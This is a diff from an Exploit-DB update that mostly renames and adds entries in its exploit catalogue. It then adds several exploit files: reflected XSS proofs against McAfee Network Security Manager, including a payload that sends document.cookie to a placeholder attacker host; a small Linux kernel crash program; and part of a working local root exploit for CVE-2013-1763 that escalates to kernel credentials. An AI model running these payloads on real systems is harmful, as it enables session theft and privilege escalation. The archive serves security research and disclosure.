Updated 05_15_2014

files.csv

@@ -3605,7 +3605,7 @@ id,file,description,date,author,platform,type,port
 3951,platforms/windows/remote/3951.html,"LeadTools Thumbnail Browser Control (lttmb14E.ocx) Remote BoF Exploit",2007-05-18,shinnai,windows,remote,0
 3952,platforms/windows/remote/3952.html,"LeadTools Raster Thumbnail Object Library (LTRTM14e.DLL) BoF Exploit",2007-05-18,shinnai,windows,remote,0
 3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 (root) Remote File Inclusion Vulnerabilities",2007-05-19,"Mehmet Ince",php,webapps,0
-3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 Auth Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69
+3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 - Auth Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69
 3955,platforms/php/webapps/3955.py,"Zomplog <= 3.8 (mp3playlist.php speler) Remote SQL Injection Exploit",2007-05-20,NeoMorphS,php,webapps,0
 3956,platforms/php/webapps/3956.php,"AlstraSoft E-Friends <= 4.21 Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0
 3957,platforms/php/webapps/3957.php,"AlstraSoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0
@@ -4945,9 +4945,9 @@ id,file,description,date,author,platform,type,port
 5311,platforms/php/webapps/5311.txt,"TopperMod 2.0 - Remote SQL Injection Vulnerability",2008-03-25,girex,php,webapps,0
 5312,platforms/php/webapps/5312.txt,"TopperMod 1.0 (mod.php) Local File Inclusion Vulnerability",2008-03-25,girex,php,webapps,0
 5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G (firmware 1.00.9) - Security Bypass Vulnerabilities",2008-03-26,meathive,hardware,remote,0
-5314,platforms/windows/remote/5314.py,"TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69
+5314,platforms/windows/remote/5314.py,"TFTP Server for Windows 1.4 - ST Buffer Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69
 5315,platforms/windows/remote/5315.py,"Quick TFTP Pro 2.1 - Remote SEH Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69
-5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD Remote DoS Exploit",2008-03-26,muts,windows,dos,0
+5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote DoS Exploit",2008-03-26,muts,windows,dos,0
 5317,platforms/php/webapps/5317.txt,"JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities",2008-03-26,CraCkEr,php,webapps,0
 5318,platforms/php/webapps/5318.txt,"Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability",2008-03-28,parad0x,php,webapps,0
 5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x (user.php) Security Code Bypass / Add Administrator Exploit",2008-03-28,NTOS-Team,php,webapps,0
@@ -5081,7 +5081,7 @@ id,file,description,date,author,platform,type,port
 5448,platforms/php/webapps/5448.txt,"Koobi Pro 6.25 poll Remote SQL Injection Vulnerability",2008-04-14,S@BUN,php,webapps,0
 5449,platforms/php/webapps/5449.php,"KwsPHP (Upload) Remote Code Execution Exploit",2008-04-14,Ajax,php,webapps,0
 5450,platforms/php/webapps/5450.txt,"Classifieds Caffe (index.php cat_id) SQL Injection Vulnerability",2008-04-15,JosS,php,webapps,0
-5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)",2008-04-15,ryujin,windows,remote,6080
+5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - PreAuth Remote SEH Overflow Exploit (0day)",2008-04-15,ryujin,windows,remote,6080
 5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database <= 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0
 5453,platforms/windows/dos/5453.pl,"DivX Player <= 6.7.0 SRT File Buffer Overflow PoC",2008-04-15,securfrog,windows,dos,0
 5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 (new) Remote SQL Injection Vulnerability",2008-04-15,cO2,php,webapps,0
@@ -9075,7 +9075,7 @@ id,file,description,date,author,platform,type,port
 9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 (cacheId) Arbitrary File Disclosure Vulnerability",2009-09-09,DokFLeed,asp,webapps,0
 9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit (univ)",2009-09-09,His0k4,windows,remote,0
 9615,platforms/windows/remote/9615.jar,"Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit",2009-09-09,"Pierre Nogues",windows,remote,0
-9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 Heap Overflow & Null pointer Dereference Vulns",2009-09-09,"Core Security",windows,dos,0
+9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow & Null pointer Dereference Vulns",2009-09-09,"Core Security",windows,dos,0
 9618,platforms/windows/local/9618.php,"Millenium MP3 Studio (pls/mpf/m3u) Local Universal BOF Exploits (SEH)",2009-09-09,hack4love,windows,local,0
 9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus vx(asx/wax/wvx) Universal Local BOF (SEH)",2009-09-09,hack4love,windows,local,0
 9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 (.mid) Integer Overflow PoC",2009-09-09,PLATEN,windows,dos,0
@@ -9131,7 +9131,7 @@ id,file,description,date,author,platform,type,port
 9670,platforms/windows/dos/9670.txt,"FotoTagger 2.12.0.0 (.XML File) Buffer Overflow PoC",2009-09-14,the_Edit0r,windows,dos,0
 9671,platforms/windows/dos/9671.py,"Tuniac v.090517c (.PLS File) Local Crash PoC",2009-09-14,zAx,windows,dos,0
 9672,platforms/windows/dos/9672.py,"PowerISO 4.0 - Local Buffer Overflow PoC",2009-09-14,Dr_IDE,windows,dos,0
-9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 GET Request Remote BOF Exploit (SEH) 0day",2009-09-15,blake,windows,remote,6660
+9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote BOF Exploit (SEH) 0day",2009-09-15,blake,windows,remote,6660
 9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - (Auth Bypass) SQL Injection Vulnerability",2009-09-15,snakespc,php,webapps,0
 9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals (details.asp PropId) Blind SQL Injection Vuln",2009-09-15,R3d-D3V!L,asp,webapps,0
 9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 /Scripts Access Restriction Bypass Vulnerability",2009-09-15,"Usman Saeed",windows,remote,0
@@ -9146,12 +9146,12 @@ id,file,description,date,author,platform,type,port
 9687,platforms/windows/local/9687.py,"SAP Player 0.9 (.pla) Universal Local Buffer Overflow Exploit (SEH)",2009-09-15,mr_me,windows,local,0
 9688,platforms/hardware/local/9688.txt,"NetAccess IP3 (ping option) Command Injection Vulnerability (auth)",2009-09-15,r00t,hardware,local,0
 9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 (m3u File) Local Crash PoC",2009-09-15,zAx,windows,dos,0
-9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 GET Request Remote BOF Exploit (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
+9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote BOF Exploit (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
 9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 (.PLS file) Local Crash Exploit",2009-09-15,prodigy,windows,dos,0
 9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 (cat) Remote Blind SQL Injection Vulnerability",2009-09-15,InjEctOr5,php,webapps,0
 9693,platforms/php/webapps/9693.txt,"Joomla Component com_djcatalog - SQL/bSQL Injection Vulnerabilities",2009-09-15,"Chip d3 bi0s",php,webapps,0
 9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 Remote Source Code Disclosure Vulnerability",2009-09-16,Dr_IDE,windows,remote,0
-9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 (ZIP File) Local Buffer Overflow PoC",2009-09-16,Dr_IDE,windows,dos,0
+9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 - (ZIP File) Local Buffer Overflow PoC",2009-09-16,Dr_IDE,windows,dos,0
 9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 (Auth Bypass) Remote SQL Injection Vulnerability",2009-09-16,snakespc,php,webapps,0
 9697,platforms/php/webapps/9697.txt,"Joomla com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection Vulnerability",2009-09-16,"Chip d3 bi0s",php,webapps,0
 9698,platforms/php/webapps/9698.pl,"Joomla Component com_jlord_rss (id) Blind SQL Injection Exploit",2009-09-16,"Chip d3 bi0s",php,webapps,0
@@ -9189,7 +9189,7 @@ id,file,description,date,author,platform,type,port
 9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging Alert Evasion, Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos,0
 9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0
 9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0
-9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2",2009-09-21,Dr_IDE,windows,dos,0
+9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC #2",2009-09-21,Dr_IDE,windows,dos,0
 9800,platforms/windows/remote/9800.cpp,"Serv-u web client 9.0.0.5 buffer overflow",2009-11-05,"Megumi Yanagishita",windows,remote,80
 9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 - 0.812.1 - Local File Inclusion vulnerability",2009-09-29,"Giuseppe Fuggiano",php,webapps,0
 9802,platforms/windows/remote/9802.html,"IBM Installation Manager <= 1.3.0 iim:// URI handler exploit",2009-09-29,bruiser,windows,remote,0
@@ -9973,7 +9973,7 @@ id,file,description,date,author,platform,type,port
 10760,platforms/php/webapps/10760.txt,"Joomla Component com_calendario Blind SQL injection Vulnerability",2009-12-28,Mr.tro0oqy,php,webapps,0
 10762,platforms/php/webapps/10762.txt,"Sunbyte e-Flower SQL Injection Vulneralbility",2009-12-28,"Don Tukulesto",php,webapps,0
 10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader Remote File Upload Vulnerability",2009-12-28,"Cyb3r IntRue",php,webapps,0
-10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 SEH (0day)",2009-12-29,Lincoln,windows,remote,6660
+10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - SEH (0day)",2009-12-29,Lincoln,windows,remote,6660
 10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
 10770,platforms/asp/webapps/10770.txt,"PSnews DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
 10771,platforms/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection and Path Diclosure Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
@@ -10111,7 +10111,7 @@ id,file,description,date,author,platform,type,port
 10968,platforms/php/webapps/10968.txt,"portal modulnet <= 1.0 - (id) SQL Injection Vulnerability",2010-01-03,Red-D3v1L,php,webapps,0
 10971,platforms/php/webapps/10971.txt,"Joomla Bamboo Simpla Admin Template SQL Injection Vulnerability",2010-01-03,R3d-D3V!L,php,webapps,0
 10972,platforms/asp/webapps/10972.txt,"Acidcat CMS 3.5 - Multiple Vulnerabilities",2010-01-03,LionTurk,asp,webapps,0
-10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow Exploit 2",2010-01-03,DouBle_Zer0,windows,remote,0
+10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow Exploit (2)",2010-01-03,DouBle_Zer0,windows,remote,0
 10974,platforms/php/webapps/10974.txt,"Simple Portal <= 2.0 - Auth Bypass",2010-01-03,Red-D3v1L,php,webapps,0
 10976,platforms/php/webapps/10976.txt,"WorldPay Script Shop (productdetail) SQL Injection Vulnerability",2010-01-03,Err0R,php,webapps,0
 10977,platforms/php/webapps/10977.txt,"Smart Vsion Script News (newsdetail) SQL Injection Vulnerability",2010-01-03,Err0R,php,webapps,0
@@ -10846,7 +10846,7 @@ id,file,description,date,author,platform,type,port
 11875,platforms/php/webapps/11875.py,"Easy-Clanpage <= 2.01 - SQL Injection Exploit",2010-03-25,"Easy Laster",php,webapps,0
 11876,platforms/php/webapps/11876.txt,"justVisual 2.0 (index.php) <= LFI Vulnerability",2010-03-25,eidelweiss,php,webapps,0
 11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack BOF",2010-03-25,sud0,windows,remote,21
-11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 DoS",2010-03-25,_SuBz3r0_,windows,dos,69
+11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - DoS",2010-03-25,_SuBz3r0_,windows,dos,69
 11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0
 11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printer Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0
 11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 beta (/photo.php) SQL-Injection exploit",2010-03-25,Sc0rpi0n,php,webapps,0
@@ -14130,7 +14130,7 @@ id,file,description,date,author,platform,type,port
 16347,platforms/windows/remote/16347.rb,"3CTftpSvc TFTP Long Mode Buffer Overflow",2010-05-09,metasploit,windows,remote,0
 16348,platforms/windows/remote/16348.rb,"Quick FTP Pro 2.1 Transfer-Mode Overflow",2010-06-15,metasploit,windows,remote,0
 16349,platforms/windows/remote/16349.rb,"TFTPD32 <= 2.21- Long Filename Buffer Overflow",2010-09-20,metasploit,windows,remote,0
-16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 Long Filename Overflow",2011-03-05,metasploit,windows,remote,0
+16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 - Long Filename Overflow",2011-03-05,metasploit,windows,remote,0
 16351,platforms/windows/remote/16351.rb,"SIPfoundry sipXezPhone 0.35a CSeq Field Overflow",2010-06-15,metasploit,windows,remote,0
 16352,platforms/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow",2010-06-15,metasploit,windows,remote,0
 16353,platforms/windows/remote/16353.rb,"AIM Triton 1.0.4 CSeq Buffer Overflow",2010-06-15,metasploit,windows,remote,0
@@ -14206,7 +14206,7 @@ id,file,description,date,author,platform,type,port
 16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 Buffer Overflow",2010-11-30,metasploit,windows,remote,0
 16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 RTSP Response Header Buffer Overflow",2010-05-09,metasploit,windows,remote,0
 16425,platforms/windows/remote/16425.rb,"Asus Dpcproxy Buffer Overflow",2010-06-22,metasploit,windows,remote,0
-16426,platforms/windows/remote/16426.rb,"BigAnt Server 2.52 USV Buffer Overflow",2010-05-09,metasploit,windows,remote,0
+16426,platforms/windows/remote/16426.rb,"BigAnt Server 2.52 - USV Buffer Overflow",2010-05-09,metasploit,windows,remote,0
 16427,platforms/windows/remote/16427.rb,"Windows RSH daemon Buffer Overflow",2010-04-30,metasploit,windows,remote,0
 16428,platforms/windows/remote/16428.rb,"IBM Tivoli Storage Manager Express RCA Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0
 16429,platforms/windows/remote/16429.rb,"HP OpenView Operations OVTrace Buffer Overflow",2010-06-22,metasploit,windows,remote,0
@@ -19700,7 +19700,7 @@ id,file,description,date,author,platform,type,port
 22463,platforms/php/webapps/22463.txt,"Wordpress Spider Catalog 1.1 HTML Code Injection and Cross-Site scripting",2012-11-04,D4NB4R,php,webapps,0
 22464,platforms/windows/dos/22464.txt,"Adobe Reader 11.0.0 Stack Overflow Crash PoC",2012-11-04,coolkaveh,windows,dos,0
 22465,platforms/windows/local/22465.txt,"Sysax FTP Automation Server 5.33 Local Privilege Escalation",2012-11-04,"Craig Freyman",windows,local,0
-22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0
+22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0
 22467,platforms/windows/dos/22467.txt,"KMPlayer 3.3.0.33 - Multiple Vulnerabilities",2012-11-04,Mr.XHat,windows,dos,0
 22468,platforms/unix/remote/22468.c,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (1)",2003-04-11,Xpl017Elz,unix,remote,0
 22469,platforms/unix/remote/22469.c,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (2)",2003-04-07,c0wboy,unix,remote,0
@@ -21680,8 +21680,8 @@ id,file,description,date,author,platform,type,port
 24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability",2013-02-19,LiquidWorm,php,webapps,0
 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
 24526,platforms/windows/remote/24526.py,"MS Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0
-24527,platforms/windows/remote/24527.rb,"BigAnt Server 2 SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
+24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
-24528,platforms/windows/remote/24528.rb,"BigAnt Server DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
+24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
 24529,platforms/php/remote/24529.rb,"OpenEMR PHP File Upload Vulnerability",2013-02-20,metasploit,php,remote,0
 24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0
 24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0
@@ -21887,7 +21887,7 @@ id,file,description,date,author,platform,type,port
 24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - BMP Image Processing Integer Overflow Vulnerability",2013-03-13,coolkaveh,windows,dos,0
 24744,platforms/multiple/webapps/24744.txt,"Apache Rave 0.11 - 0.20 - User Information Disclosure",2013-03-13,"Andreas Guth",multiple,webapps,0
 24745,platforms/windows/remote/24745.rb,"Honeywell HSC Remote Deployer ActiveX Remote Code Execution",2013-03-13,metasploit,windows,remote,0
-24746,platforms/lin_x86-64/local/24746.c,"Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
+24746,platforms/lin_x86-64/local/24746.c,"Ubuntu 12.10 64-Bit sock_diag_handlers - Local Root Exploit",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
 24747,platforms/linux/dos/24747.c,"Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0
 24748,platforms/php/webapps/24748.txt,"event calendar Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0
 24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0
@@ -30035,6 +30035,7 @@ id,file,description,date,author,platform,type,port
 33314,platforms/linux/dos/33314.html,"Mozilla Firefox <= 3.0.14 CVE-2009-3382 Remote Memory Corruption Vulnerability",2009-10-27,"Carsten Book",linux,dos,0
 33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 Multiple Security Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0
 33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 Multiple Security Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0
+33317,platforms/php/webapps/33317.txt,"AlienVault OSSIM 4.6.1 - Authenticated SQL Injection",2014-05-12,"Chris Hebert",php,webapps,443
 33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 and NetBSD 5.0.1 'printf(1)' Format String Parsing Denial of Service Vulnerability",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
 33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions 'printf(3)' Memory Corruption Vulnerability",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
 33320,platforms/php/webapps/33320.txt,"TFTgallery  0.13 'sample' Parameter Cross Site Scripting Vulnerability",2009-11-02,blake,php,webapps,0
@@ -30049,3 +30050,18 @@ id,file,description,date,author,platform,type,port
 33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
 33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
 33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
+33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3-3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0
+33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x 'ptrace' Mutex Handling Local Denial of Service Vulnerability",2009-11-04,"Micheal Turner",osx,dos,0
+33338,platforms/linux/dos/33338.c,"Linux Kernel 2.6.x 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"Robin Getz",linux,dos,0
+33339,platforms/linux/remote/33339.txt,"CUPS 'kerberos' Parameter Cross Site Scripting Vulnerability",2009-11-09,"Aaron Sigel",linux,remote,0
+33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 index.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0
+33341,platforms/php/webapps/33341.txt,"CuteNews 1.4.6 search.php from_date_day Parameter Path Disclosure",2009-11-10,"Andrew Horton",php,webapps,0
+33342,platforms/php/webapps/33342.txt,"CuteNews 1.4.6 search.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0
+33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 register.php result Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0
+33344,platforms/php/webapps/33344.txt,"CuteNews 1.4.6 index.php New User Creation CSRF",2009-11-10,"Andrew Horton",php,webapps,0
+33345,platforms/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",php,webapps,0
+33346,platforms/jsp/webapps/33346.txt,"McAfee Network Security Manager 5.1.7 Multiple Cross Site Scripting Vulnerabilities",2009-11-06,"Daniel King",jsp,webapps,0
+33347,platforms/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 Information Disclosure Vulnerability",2009-11-06,"Daniel King",jsp,webapps,0
+33348,platforms/windows/dos/33348.pl,"TFTPD32 4.5 / TFTPD64 4.5 - DoS PoC",2014-05-14,"Martinez FrostCard",windows,dos,0
+33350,platforms/windows/dos/33350.xml,"Yahoo! Messenger 9 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service Vulnerability",2009-11-12,HACKATTACK,windows,dos,0
+33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 '/dhost/modules?I:' Buffer Overflow Vulnerability",2009-11-12,HACKATTACK,novell,remote,0

platforms/jsp/webapps/33346.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/37003/info
+
+McAfee Network Security Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+These issues affect McAfee Network Security Manager 5.1.7.7; other versions may also be affected. 
+
+https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14"><script>alert('XSS')</script>8b3283a1e57
+
+https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a"><script>alert(1)</script>2aa99b60533&iaction=precreatefcb14"><script>alert(â??XSSâ??)</script>8b3283a1e57
+

platforms/jsp/webapps/33347.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37004/info
+
+McAfee Network Security Manager is prone to an information-disclosure vulnerability because it fails to properly protect sensitive cookie data with the 'HTTPOnly' protection mechanism.
+
+A successful exploit may allow attackers to steal cookie-based authentication credentials; information harvested may aid in further attacks.
+
+This issue affects McAfee Network Security Manager 5.1.7.7; other versions may also be affected.
+
+
+https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb1
+4%22%3E%3Cscript%3Enew%20Image().src=%22http://x.x.x.x/mcafee/log.cgi?c=%22%2BencodeURI(document.cookie);%3C/script%3E8b3283a1e57 

platforms/linux/dos/33338.c

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/36953/info
+
+The Linux kernel is prone to a local denial-of-service vulnerability that stems from a NULL-pointer dereference.
+
+Attackers can exploit this issue to crash the affected computer, denying service to legitimate users.
+
+int main()
+{ 
+static long long a[1024 * 1024 * 20] = { 0 }; 
+
+return a;
+
+}

platforms/linux/local/33336.txt

@@ -0,0 +1,164 @@
+/* 
+* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
+* bug found by Spender
+* poc by SynQ
+* 
+* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
+* using nl_table->hash.rehash_time, index 81
+* 
+* Fedora 18 support added
+* 
+* 2/2013
+*/
+
+#include <unistd.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+#include <netinet/tcp.h>
+#include <errno.h>
+#include <linux/if.h>
+#include <linux/filter.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <linux/sock_diag.h>
+#include <linux/inet_diag.h>
+#include <linux/unix_diag.h>
+#include <sys/mman.h>
+
+typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+_commit_creds commit_creds;
+_prepare_kernel_cred prepare_kernel_cred;
+unsigned long sock_diag_handlers, nl_table;
+
+int __attribute__((regparm(3)))
+kernel_code()
+{
+	commit_creds(prepare_kernel_cred(0));
+	return -1;
+}
+
+int jump_payload_not_used(void *skb, void *nlh)
+{
+	asm volatile (
+		"mov $kernel_code, %eax\n"
+		"call *%eax\n"
+	);
+}
+
+unsigned long
+get_symbol(char *name)
+{
+	FILE *f;
+	unsigned long addr;
+	char dummy, sym[512];
+	int ret = 0;
+ 
+	f = fopen("/proc/kallsyms", "r");
+	if (!f) {
+		return 0;
+	}
+ 
+	while (ret != EOF) {
+		ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
+		if (ret == 0) {
+			fscanf(f, "%s\n", sym);
+			continue;
+		}
+		if (!strcmp(name, sym)) {
+			printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
+			fclose(f);
+			return addr;
+		}
+	}
+	fclose(f);
+ 
+	return 0;
+}
+
+int main(int argc, char*argv[])
+{
+	int fd;
+	unsigned family;
+	struct {
+		struct nlmsghdr nlh;
+		struct unix_diag_req r;
+	} req;
+	char	buf[8192];
+
+	if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
+		printf("Can't create sock diag socket\n");
+		return -1;
+	}
+
+	memset(&req, 0, sizeof(req));
+	req.nlh.nlmsg_len = sizeof(req);
+	req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
+	req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
+	req.nlh.nlmsg_seq = 123456;
+
+	//req.r.sdiag_family = 89;
+	req.r.udiag_states = -1;
+	req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
+
+	if(argc==1){
+		printf("Run: %s Fedora|Ubuntu\n",argv[0]);
+		return 0;
+	}
+	else if(strcmp(argv[1],"Fedora")==0){
+	  commit_creds = (_commit_creds) get_symbol("commit_creds");
+	  prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
+	  sock_diag_handlers = get_symbol("sock_diag_handlers");
+	  nl_table = get_symbol("nl_table");
+	  
+	  if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
+		printf("some symbols are not available!\n");
+		exit(1);
+		}
+
+	  family = (nl_table - sock_diag_handlers) / 4;
+	  printf("family=%d\n",family);
